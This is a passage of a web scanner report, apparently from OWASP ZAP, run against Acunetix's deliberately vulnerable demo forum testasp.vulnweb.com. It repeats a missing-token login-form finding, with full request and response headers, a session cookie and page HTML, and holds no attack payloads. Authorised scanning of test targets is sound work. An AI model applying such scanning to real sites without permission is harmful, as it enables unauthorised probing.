</form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
